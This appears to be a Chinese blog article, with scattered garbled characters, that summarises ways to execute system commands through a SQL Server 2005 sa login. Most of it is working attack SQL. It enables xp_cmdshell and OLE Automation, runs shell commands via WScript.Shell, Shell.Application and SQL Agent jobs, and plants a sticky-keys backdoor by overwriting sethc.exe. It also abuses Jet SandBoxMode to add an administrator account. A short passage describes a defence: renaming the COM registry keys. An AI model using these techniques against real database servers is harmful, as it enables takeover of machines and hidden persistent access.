快捷導(dǎo)航

sql2005 sa執(zhí)行命令方法總結(jié)

更新時(shí)間：2008年12月01日 20:20:54 作者：

測(cè)試環(huán)境：windows xp pro sp2 + mssql 2005（服務(wù)以system權(quán)限啟動(dòng)）

一．xp_cmdshell
EXEC master..xp_cmdshell 'ipconfig'
開(kāi)啟xp_cmdshell:
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
二．sp_oacreate
創(chuàng)建wscript.shell對(duì)象
use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cmd /c "net user" > c:\test.tmp'
創(chuàng)建scripting.filesystemobject對(duì)象
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
可以用utilman.exe代替sethc.exe達(dá)到同樣的效果后門(mén)很酷嗎，呵呵
創(chuàng)建Shell.Application對(duì)象
declare @o int
exec sp_oacreate 'Shell.Application', @o out
exec sp_oamethod @o, 'ShellExecute',null, 'cmd.exe','cmd /c net user >c:\test.txt','c:\windows\system32','',1;
開(kāi)啟OLE Automation Procedures
sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO
我們的對(duì)策就是把對(duì)象做一下手腳
WScript.Shell可以調(diào)用系統(tǒng)內(nèi)核運(yùn)行DOS基本命令
可以通過(guò)修改注冊(cè)表，將此組件改名，來(lái)防止危害。
HKEY_CLASSES_ROOT\WScript.Shell\
及HKEY_CLASSES_ROOT\WScript.Shell.1\
改名為其它的名字，如：改為WScript.Shell_ChangeName或WScript.Shell.1_ChangeName
自己以后調(diào)用的時(shí)候使用這個(gè)就可以正常調(diào)用此組件了
也要將clsid值也改一下
HKEY_CLASSES_ROOT\WScript.Shell\CLSID\項(xiàng)目的值
HKEY_CLASSES_ROOT\WScript.Shell.1\CLSID\項(xiàng)目的值
同wscript.shell理、scripting.filesystemobject、Shell.Application
三．JOB
利用JOB執(zhí)行命令，有一個(gè)先決條件就是開(kāi)啟SQLSERVERAGENT服務(wù)，下面的語(yǔ)句可以開(kāi)啟
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'
use msdb create table [jncsql](resulttxt nvarchar(1024) null) exec sp_delete_job null,'x' exec sp_add_job 'x' exec
sp_add_jobstep null,'x',null,'1','cmdexec','cmd /c "net user>c:\test.test"' exec sp_add_jobserver
null,'x',@@servername exec sp_start_job 'x';
四．SandBoxMode（網(wǎng)上常說(shuō)的沙盒模式）
原理：在access里調(diào)用VBS的shell函數(shù)，以system權(quán)限執(zhí)行任何命令。但是試用這個(gè)函數(shù)之前必須把注冊(cè)表里的一個(gè)叫SandBoxmode的開(kāi)關(guān)打開(kāi)，
注冊(cè)表：HKEY_LOCAL_MACHINE\SoFtWare\Micris
oft\Jet\4.0\Engine\SandBoxmode.默認(rèn)值為2，這個(gè)人鍵值為0表示始
終禁用SandBoxmode模式，1表示對(duì)于非Acess應(yīng)用程序試用SandBoxmode模式，2表示對(duì)access應(yīng)用程序使用SandBoxmode模式，3則表示完全開(kāi)啟安全設(shè)置。//1或0都可以執(zhí)行命令
EXEC sp_addlinkedserver 'testsql','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb'
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
EXEC master..xp_regread HKEY_LOCAL_MACHINE ,'Software\Microsoft\Jet\4.0\engines','SandBoxMode'
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user test test /add")')
select * from openrowset('microsoft.jet.oledb.4.0',
';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators test /add")')
下面是系統(tǒng)自帶的兩個(gè)mdb文件
C:\WINDOWS\system32\ias\dnary.mdb
C:\WINDOWS\system32\ias\ias.mdb
總結(jié)
上述幾種方法（仔細(xì)看看我都忘記有幾種了，哈哈。你可以發(fā)散思維，再找出來(lái)幾種）都是在默認(rèn)情況下測(cè)試的，往往滲透的時(shí)候有很多限制條件，我們可以逐一克服，利用組件得到服務(wù)器信息，讀取、創(chuàng)建文件了等等，我們還是要對(duì)權(quán)限這個(gè)詞組有深層次的理解啊。
附注
關(guān)于*.exe c:\windows\system32\ 還有c:\windows\system32\dllcache呢
關(guān)于cmd.exe還有command.exe呢
關(guān)于net.exe還有net1.exe呢
Mdb文件不存在我們可以上傳一個(gè)啊
執(zhí)行命令的組件不是只有一個(gè)哦